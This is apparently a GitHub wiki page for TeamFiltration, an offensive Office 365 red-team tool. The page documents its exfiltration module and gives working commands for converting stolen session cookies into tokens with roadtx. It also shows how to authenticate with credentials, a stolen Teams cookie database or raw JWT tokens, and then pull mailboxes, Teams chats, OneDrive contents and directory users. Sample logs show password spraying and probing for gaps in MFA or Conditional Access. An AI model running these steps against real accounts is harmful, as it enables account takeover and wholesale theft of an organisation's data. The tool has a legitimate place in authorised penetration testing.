Skip to content

Exfiltration

Jump to bottom
Flangvik edited this page Mar 8, 2026 · 9 revisions

Cookies + RoadTools = ❤

If you want to authenticate to your target O365 account using cookies, you must first exchange the cookies for tokens using the RoadTools Python toolkit by @_dirkjan.

Identify the ESTSAUTHPERSISTENT cookie and give it to RoadTX as shown below. This will authenticate using the cookie and retrieve a fresh set of JWT tokens. The produced tokens will be saved in the .roadtools_auth file by default.

roadtx interactiveauth --estscookie "0.AXoAqzBRR7ViQU.................<snip>"

Then feed that .roadtools_auth file into TeamFiltration:

[♥] TeamFiltration V3.5.1 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --roadtools .roadtools_auth
[!] ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[+] Exfiltrating data from user test@example.com
[EXFIL] 01.03.2023 14:10:38 EST Exfiltrating AAD users and groups via MS AD Graph API
[EXFIL] 01.03.2023 14:10:44 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:10:45 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:10:49 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:10:50 EST Fetched 1337 email IDs, exfiltrating content!
[EXFIL] 01.03.2023 14:10:54 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:10:55 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:10:57 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:10:58 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:11:00 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:11:00 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:11:01 EST   |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:11:08 EST Exfiltrating 0 recent files accessible by user

Credentials

If you have credentials and simply want to use the exfiltration module, they can be supplied directly. If the login is blocked by MFA / Conditional Access, TeamFiltration will attempt to identify a gap in the policy(s) by brute-forcing a series of login combinations using unique combinations of Resource URI, ClientId, and Device.

[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --config C:\config.txt --outpath C:\TeamFiltration --exfil --all --username dave@example.com --password Passw0rd123!

[!] ORIGIN IP WILL BE LOGGED, are you an adult? (Y/N)
[SPRAY] 01.03.2023 14:02:11 EST Sprayed dave@example.com:Passw0rd123!     => VALID NO MFA!
[SPRAY] 01.03.2023 14:02:19 EST Refreshed a token for => https://graph.microsoft.com
[SPRAY] 01.03.2023 14:02:29 EST Refreshed a token for => https://api.spaces.skype.com
[EXFIL] 01.03.2023 14:02:37 EST Cross-resource-refresh allowed, we can exfil all that things!
[SPRAY] 01.03.2023 14:02:40 EST Refreshed a token for => https://graph.windows.net
[EXFIL] 01.03.2023 14:02:46 EST Exfiltrating AAD users and groups via MS graph API
[EXFIL] 01.03.2023 14:02:47 EST Got 1337 AAD users, appending to database as valid users!
[EXFIL] 01.03.2023 14:04:07 EST Exfiltrating emails from Outlook!
[EXFIL] 01.03.2023 14:04:08 EST Fetched 1337 email IDs, exfiltrating content!
[EXFIL] 01.03.2023 14:04:14 EST Exfiltrating recently used contacts
[EXFIL] 01.03.2023 14:04:16 EST Exfiltrating all sent attachments from chat logs
[EXFIL] 01.03.2023 14:04:17 EST Exfiltrating all chat logs/conversations
[EXFIL] 01.03.2023 14:04:32 EST Exfiltrating shared files from OneDrive
[EXFIL] 01.03.2023 14:04:34 EST Exfiltrating the entire personal OneDrive
[EXFIL] 01.03.2023 14:04:36 EST |--> Desktop (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Documents (Folder)
[EXFIL] 01.03.2023 14:04:36 EST |--> Pictures (Folder)
[EXFIL] 01.03.2023 14:04:37 EST   |--> Microsoft Teams.lnk
[EXFIL] 01.03.2023 14:04:40 EST Exfiltrating 0 recent files accessible by user

Teams Database

If you have access to an exfiltrated Teams SQLite database (typically found at %AppData%\Microsoft\Teams\Cookies or similar), it can be provided to TeamFiltration to extract authentication cookies and tokens directly.

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --teams-db "C:\ExfilData\Cookies"

TeamFiltration will extract refresh tokens and session cookies from the database and use them to authenticate to the target's O365 resources.

Raw Access Tokens

You can authenticate using a single JWT access token, a comma-separated list of JWT tokens, or a path to a file containing newline-separated access tokens. These tokens are used directly as the authentication credential for exfiltration — no password or interactive login is required.

Single token:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --tokens "eyJ0eXAiOiJKV1Qi..."

Comma-separated tokens:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --all --tokens "eyJ0eXAi...,eyJ0eXAi..."

File of tokens (one per line):

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --onedrive --owa --tokens C:\tokens.txt

Dumping Gathered JWT Tokens

After a successful exfiltration session, TeamFiltration accumulates JWT tokens for multiple SSO resources (Graph, Outlook, SharePoint, OneDrive, Teams). These can be dumped to disk in JSON format using --jwt-tokens:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --exfil --jwt-tokens

This produces a JSON file containing tokens for: MsGraph, AdGraph, Outlook, SharePoint, OneDrive, and Teams — useful for further tooling or manual API access.

Clone this wiki locally